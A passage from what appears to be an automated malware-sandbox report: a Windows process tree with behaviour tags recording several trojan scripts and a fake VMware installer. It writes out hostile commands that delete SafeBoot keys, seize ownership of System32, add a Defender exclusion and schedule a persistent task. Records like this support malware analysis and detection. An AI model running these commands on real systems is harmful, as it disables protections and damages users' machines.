                                                                          2⤵
                                                                            PID:5460
                                                                            • C:\Windows\System32\wscript.exe
                                                                              "C:\Windows\System32\wscript.exe" "C:\Users\Admin\Downloads\Bolbi.vbs" /elevated
                                                                              3⤵
                                                                              • UAC bypass
                                                                              • Blocklisted process makes network request
                                                                              • Disables cmd.exe use via registry modification
                                                                              • Event Triggered Execution: Image File Execution Options Injection
                                                                              • Adds Run key to start application
                                                                              • Checks whether UAC is enabled
                                                                              • Sets desktop wallpaper using registry
                                                                              • Drops file in Windows directory
                                                                              • Modifies Control Panel
                                                                              • System policy modification
                                                                              PID:4536
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /c C:\Users\Public\Ghostroot\KillDora.bat
                                                                                4⤵
                                                                                • Modifies registry class
                                                                                PID:5700
                                                                                • C:\Windows\System32\rundll32.exe
                                                                                  C:\Windows\System32\RUNDLL32.EXE user32.dll, UpdatePerUserSystemParameters
                                                                                  5⤵
                                                                                    PID:5704
                                                                                  • C:\Windows\system32\reg.exe
                                                                                    reg delete "HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal" /f
                                                                                    5⤵
                                                                                    • Impair Defenses: Safe Mode Boot
                                                                                    PID:3496
                                                                                  • C:\Windows\system32\reg.exe
                                                                                    reg delete "HKLM\System\CurrentControlSet\Control\SafeBoot\Network" /f
                                                                                    5⤵
                                                                                      PID:5960
                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                      taskkill /f /im explorer.exe
                                                                                      5⤵
                                                                                      • Kills process with taskkill
                                                                                      PID:2984
                                                                                    • C:\Windows\explorer.exe
                                                                                      explorer.exe
                                                                                      5⤵
                                                                                      • Boot or Logon Autostart Execution: Active Setup
                                                                                      • Enumerates connected drives
                                                                                      • Checks SCSI registry key(s)
                                                                                      • Modifies registry class
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious behavior: GetForegroundWindowSpam
                                                                                      • Suspicious use of SendNotifyMessage
                                                                                      PID:5480
                                                                                    • C:\Windows\system32\takeown.exe
                                                                                      takeown /f C:\Windows\System32\
                                                                                      5⤵
                                                                                      • Possible privilege escalation attempt
                                                                                      • Modifies file permissions
                                                                                      PID:5868
                                                                                    • C:\Windows\system32\icacls.exe
                                                                                      icacls C:\Windows\System32 /Grant Users:F
                                                                                      5⤵
                                                                                      • Possible privilege escalation attempt
                                                                                      • Modifies file permissions
                                                                                      PID:1192
                                                                                    • C:\Windows\system32\takeown.exe
                                                                                      takeown /f C:\Windows\
                                                                                      5⤵
                                                                                      • Possible privilege escalation attempt
                                                                                      • Modifies file permissions
                                                                                      PID:5252
                                                                                    • C:\Windows\system32\icacls.exe
                                                                                      icacls C:\Windows\ /Grant Users:F
                                                                                      5⤵
                                                                                      • Possible privilege escalation attempt
                                                                                      • Modifies file permissions
                                                                                      PID:5328
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6716,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=6940 /prefetch:8
                                                                                2⤵
                                                                                  PID:5672
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=7500,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=7044 /prefetch:8
                                                                                  2⤵
                                                                                    PID:5788
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=7512,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=7192 /prefetch:8
                                                                                    2⤵
                                                                                    • Subvert Trust Controls: Mark-of-the-Web Bypass
                                                                                    • NTFS ADS
                                                                                    PID:5084
                                                                                  • C:\Users\Admin\Downloads\BlueScreen.exe
                                                                                    "C:\Users\Admin\Downloads\BlueScreen.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:6124
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=7464,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=7060 /prefetch:8
                                                                                    2⤵
                                                                                    • NTFS ADS
                                                                                    PID:6020
                                                                                  • C:\Windows\System32\WScript.exe
                                                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\Carewmr.vbs"
                                                                                    2⤵
                                                                                    • NTFS ADS
                                                                                    PID:1368
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.avp.ru/
                                                                                      3⤵
                                                                                      • Enumerates system info in registry
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                      PID:4768
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd71c13cb8,0x7ffd71c13cc8,0x7ffd71c13cd8
                                                                                        4⤵
                                                                                          PID:1488
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1956,13615604389583845898,17170530987873962288,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1948 /prefetch:2
                                                                                          4⤵
                                                                                            PID:4076
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1956,13615604389583845898,17170530987873962288,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 /prefetch:3
                                                                                            4⤵
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            PID:5556
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1956,13615604389583845898,17170530987873962288,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2696 /prefetch:8
                                                                                            4⤵
                                                                                              PID:5472
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,13615604389583845898,17170530987873962288,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3144 /prefetch:1
                                                                                              4⤵
                                                                                                PID:2596
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,13615604389583845898,17170530987873962288,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
                                                                                                4⤵
                                                                                                  PID:5368
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,13615604389583845898,17170530987873962288,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3836 /prefetch:1
                                                                                                  4⤵
                                                                                                    PID:6060
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,13615604389583845898,17170530987873962288,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3968 /prefetch:1
                                                                                                    4⤵
                                                                                                      PID:5312
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,13615604389583845898,17170530987873962288,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4144 /prefetch:1
                                                                                                      4⤵
                                                                                                        PID:1076
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,13615604389583845898,17170530987873962288,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4168 /prefetch:1
                                                                                                        4⤵
                                                                                                          PID:3028
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,13615604389583845898,17170530987873962288,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4308 /prefetch:1
                                                                                                          4⤵
                                                                                                            PID:4268
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,13615604389583845898,17170530987873962288,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4432 /prefetch:1
                                                                                                            4⤵
                                                                                                              PID:5208
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,13615604389583845898,17170530987873962288,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4600 /prefetch:1
                                                                                                              4⤵
                                                                                                                PID:6320
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,13615604389583845898,17170530987873962288,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3680 /prefetch:1
                                                                                                                4⤵
                                                                                                                  PID:6512
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1956,13615604389583845898,17170530987873962288,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6348 /prefetch:8
                                                                                                                  4⤵
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  PID:1120
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,13615604389583845898,17170530987873962288,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6396 /prefetch:1
                                                                                                                  4⤵
                                                                                                                    PID:7040
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,13615604389583845898,17170530987873962288,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6416 /prefetch:1
                                                                                                                    4⤵
                                                                                                                      PID:7140
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1956,13615604389583845898,17170530987873962288,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5012 /prefetch:8
                                                                                                                      4⤵
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      PID:6960
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,13615604389583845898,17170530987873962288,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6544 /prefetch:1
                                                                                                                      4⤵
                                                                                                                        PID:6700
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,13615604389583845898,17170530987873962288,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1
                                                                                                                        4⤵
                                                                                                                          PID:6292
                                                                                                                    • C:\Windows\SYSTEM32\wscript.exe
                                                                                                                      wscript.exe C:\Users\Public\ghostroot\Message.vbs "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=7148,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=7244 /prefetch:8
                                                                                                                      2⤵
                                                                                                                        PID:5312
                                                                                                                      • C:\Windows\SYSTEM32\wscript.exe
                                                                                                                        wscript.exe C:\Users\Public\ghostroot\Message.vbs C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\DudleyTrojan.bat" "
                                                                                                                        2⤵
                                                                                                                          PID:6660
                                                                                                                        • C:\Windows\SYSTEM32\wscript.exe
                                                                                                                          wscript.exe C:\Users\Public\ghostroot\Message.vbs C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\DudleyTrojan.bat" "
                                                                                                                          2⤵
                                                                                                                            PID:6508
                                                                                                                          • C:\Windows\SYSTEM32\wscript.exe
                                                                                                                            wscript.exe C:\Users\Public\ghostroot\Message.vbs "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=7452,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=7100 /prefetch:8
                                                                                                                            2⤵
                                                                                                                              PID:5648
                                                                                                                            • C:\Windows\SYSTEM32\wscript.exe
                                                                                                                              wscript.exe C:\Users\Public\ghostroot\Message.vbs "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3556,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3996 /prefetch:2
                                                                                                                              2⤵
                                                                                                                                PID:5476
                                                                                                                              • C:\Windows\SYSTEM32\wscript.exe
                                                                                                                                wscript.exe C:\Users\Public\ghostroot\Message.vbs "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3660,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3296 /prefetch:2
                                                                                                                                2⤵
                                                                                                                                  PID:4676
                                                                                                                                • C:\Windows\SYSTEM32\wscript.exe
                                                                                                                                  wscript.exe C:\Users\Public\ghostroot\Message.vbs "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=3268,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4156 /prefetch:2
                                                                                                                                  2⤵
                                                                                                                                    PID:3788
                                                                                                                                  • C:\Windows\SYSTEM32\wscript.exe
                                                                                                                                    wscript.exe C:\Users\Public\ghostroot\Message.vbs "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=3624,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5788 /prefetch:2
                                                                                                                                    2⤵
                                                                                                                                      PID:2672
                                                                                                                                    • C:\Windows\SYSTEM32\wscript.exe
                                                                                                                                      wscript.exe C:\Users\Public\ghostroot\Message.vbs "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=4008,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5088 /prefetch:2
                                                                                                                                      2⤵
                                                                                                                                        PID:6984
                                                                                                                                      • C:\Windows\SYSTEM32\wscript.exe
                                                                                                                                        wscript.exe C:\Users\Public\ghostroot\Message.vbs "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=disabled --field-trial-handle=6284,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5852 /prefetch:2
                                                                                                                                        2⤵
                                                                                                                                          PID:6376
                                                                                                                                        • C:\Windows\SYSTEM32\wscript.exe
                                                                                                                                          wscript.exe C:\Users\Public\ghostroot\Message.vbs "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=disabled --field-trial-handle=5940,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=6916 /prefetch:2
                                                                                                                                          2⤵
                                                                                                                                            PID:6344
                                                                                                                                          • C:\Windows\SYSTEM32\wscript.exe
                                                                                                                                            wscript.exe C:\Users\Public\ghostroot\Message.vbs "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=disabled --field-trial-handle=5752,i,12356397054557151435,6009615380875955596,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4160 /prefetch:2
                                                                                                                                            2⤵
                                                                                                                                              PID:4936
                                                                                                                                          • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                                                                            "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                                                                            1⤵
                                                                                                                                              PID:3108
                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                                                                              1⤵
                                                                                                                                                PID:3588
                                                                                                                                              • C:\Windows\System32\rundll32.exe
                                                                                                                                                C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                1⤵
                                                                                                                                                  PID:3200
                                                                                                                                                • C:\Program Files\7-Zip\7zG.exe
                                                                                                                                                  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap8420:110:7zEvent12232
                                                                                                                                                  1⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  PID:4544
                                                                                                                                                • C:\Program Files\7-Zip\7zG.exe
                                                                                                                                                  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\VMware.Workstation.16.Pro\VMware.Workstation.16.Pro\" -ad -an -ai#7zMap19419:162:7zEvent2249
                                                                                                                                                  1⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  PID:4544
                                                                                                                                                • C:\Users\Admin\Downloads\VMware.Workstation.16.Pro\VMware.Workstation.16.Pro\setup.exe
                                                                                                                                                  "C:\Users\Admin\Downloads\VMware.Workstation.16.Pro\VMware.Workstation.16.Pro\setup.exe"
                                                                                                                                                  1⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                  PID:896
                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
                                                                                                                                                    2⤵
                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                    PID:4840
                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "XOYOX" /tr "C:\ProgramData\ChromesSoftware\XOYOX.exe"
                                                                                                                                                    2⤵
                                                                                                                                                      PID:5032
                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "XOYOX" /tr "C:\ProgramData\ChromesSoftware\XOYOX.exe"
                                                                                                                                                        3⤵
                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                        PID:2832
                                                                                                                                                  • C:\Windows\system32\NOTEPAD.EXE
                                                                                                                                                    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\VMware.Workstation.16.Pro\VMware.Workstation.16.Pro\readme-en.txt
                                                                                                                                                    1⤵
                                                                                                                                                    • Opens file in notepad (likely ransom note)
                                                                                                                                                    PID:712
                                                                                                                                                  • C:\Users\Admin\Downloads\VMware.Workstation.16.Pro\VMware.Workstation.16.Pro\setup.exe
                                                                                                                                                    "C:\Users\Admin\Downloads\VMware.Workstation.16.Pro\VMware.Workstation.16.Pro\setup.exe"
                                                                                                                                                    1⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:3596
                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
                                                                                                                                                      2⤵
                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                      PID:1320
                                                                                                                                                  • C:\Users\Admin\Downloads\VMware.Workstation.16.Pro\VMware.Workstation.16.Pro\setup.exe
                                                                                                                                                    "C:\Users\Admin\Downloads\VMware.Workstation.16.Pro\VMware.Workstation.16.Pro\setup.exe"
                                                                                                                                                    1⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:2672
                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
                                                                                                                                                      2⤵
                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                      PID:2392
                                                                                                                                                  • C:\Users\Admin\Downloads\archive\Apex9.1\Apex.exe
                                                                                                                                                    "C:\Users\Admin\Downloads\archive\Apex9.1\Apex.exe"
                                                                                                                                                    1⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                    PID:5492
                                                                                                                                                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                                                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\archive\Torrentator\Torrent Cash.pdf"
                                                                                                                                                    1⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                    PID:5608
                                                                                                                                                  • C:\Windows\system32\NOTEPAD.EXE
